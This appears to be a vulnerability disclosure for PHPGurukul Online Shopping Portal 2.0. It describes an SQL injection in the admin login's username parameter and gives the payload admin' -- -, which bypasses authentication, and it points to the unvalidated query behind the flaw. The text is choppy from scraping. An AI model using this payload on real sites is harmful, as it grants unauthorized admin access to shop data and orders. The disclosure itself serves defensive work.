/shopping/admin/index.php
]Exploit Title: PHPGurukul Online Shopping Portal Project 2.0 - SQL Injection
Exploit Author: SeaWind
Vendor Homepage: https://phpgurukul.com/
Software Link: https://phpgurukul.com/shopping-portal-free-download/
Version: 2.0
Vulnerable endpoint: http://localhost/shopping/admin/index.php
Tested on : Windows 11, XAMPP
http://localhost/shopping/admin/index.php
) an SQL Injection vulnerability was found at username
parameter. This will allow attackers to access the admin panel page (for example http://localhost:88/admin/todays-orders.php
) without any permission.http://localhost/shopping/admin/index.php
username
parameter, add admin' -- -
as the payload and in the password
parameter, fill out with anything. In my example, I will fill username
parameter with payload admin' -- -
and 123
as the payload for password
parameterlogin
button, and with that, I was able to login to admin panel page without knowing the real password/shopping/admin/index.php
. In the line 9 of the code, the query SELECT * FROM admin WHERE username='$username' and password='$password'
doesn't have any validation or variable check before passing to this query at $username
variable make it vulnerable to SQL Injection.